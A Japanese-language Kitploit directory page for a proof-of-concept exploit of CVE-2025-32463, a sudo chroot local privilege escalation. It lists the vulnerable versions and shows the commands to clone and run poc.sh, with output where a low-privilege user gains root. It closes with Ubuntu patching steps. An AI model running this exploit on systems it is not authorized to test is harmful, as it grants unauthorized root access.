Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-32463 — # CVE-2025-32463 – Sudo EoP エクスプロイト (PoC)(プリコンパイル済み .so 付き) | Kitploit
ツール/GitHubGitHub/zinzloun/cve-2025-32463
特権昇格脆弱性分析エクスプロイトペネトレーションテスト学習と教育
GitHubzinzloun/cve-2025-32463

CVE-2025-32463

# CVE-2025-32463 – Sudo EoP エクスプロイト (PoC)(プリコンパイル済み .so 付き)

リポジトリを見る
1471年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-32463 – Sudo EoP エクスプロイト(PoC)+プリコンパイル済みライブラリ

このリポジトリには、Rich Mirch によって発見された sudo のローカル権限昇格の脆弱性 CVE-2025-32463 の概念実証(PoC)エクスプロイトが含まれています。

クレジット

https://github.com/kh4sh3i/CVE-2025-32463

⚠️ 免責事項

この PoC は教育目的および許可を得たテスト目的のみを対象としています。所有していないシステム、または明示的な許可を得ずに評価するシステムでは、このコードを使用しないでください。


🔧 要件

  • chroot 対応(-R)の sudo:バージョン 1.9.14 〜 1.9.17
  • nsswitch が有効であること

🚀 PoC の実行方法

root@kitploit:~
git clone https://github.com/zinzloun/CVE-2025-32463.git
cd CVE-2025-32463

現在のユーザーが低い権限を持っているか確認します

root@kitploit:~
:~/CVE-2025-32463$ id
uid=1001(poc) gid=1001(poc) groups=1001(poc),100(users)

要件を確認します

root@kitploit:~
:~/CVE-2025-32463$ sudo --version
Sudo version 1.9.15p5
...
:~/CVE-2025-32463$ ls -al /etc/nsswitch.conf
-rw-r--r-- 1 root root 526 Feb 16 20:57 /etc/nsswitch.conf

エクスプロイトを実行します

root@kitploit:~
:~/CVE-2025-32463$ chmod +x poc.sh && ./poc.sh
woot!
root@ubutes01:/# id
uid=0(root) gid=0(root) groups=0(root),100(users),1001(poc)

🚒 Ubuntu 24.04 LTS での修復手順

  • ネットワークに接続されたシステムの場合、次のコマンドを実行するだけです

    root@kitploit:~
    sudo apt update && sudo apt upgrade
    
  • エアギャップ環境のシステムの場合:最新の sudo パッケージは、https://github.com/sudo-project/sudo/releases/download/v1.9.17p1/sudo_1.9.17-2_ubu2404_amd64.deb から入手できます。パッケージを対象システムに転送したら、次のコマンドを実行するだけです:

    root@kitploit:~
     sudo dpkg -i sudo_1.9.17-2_ubu2404_amd64.deb
    
ツールをダウンロード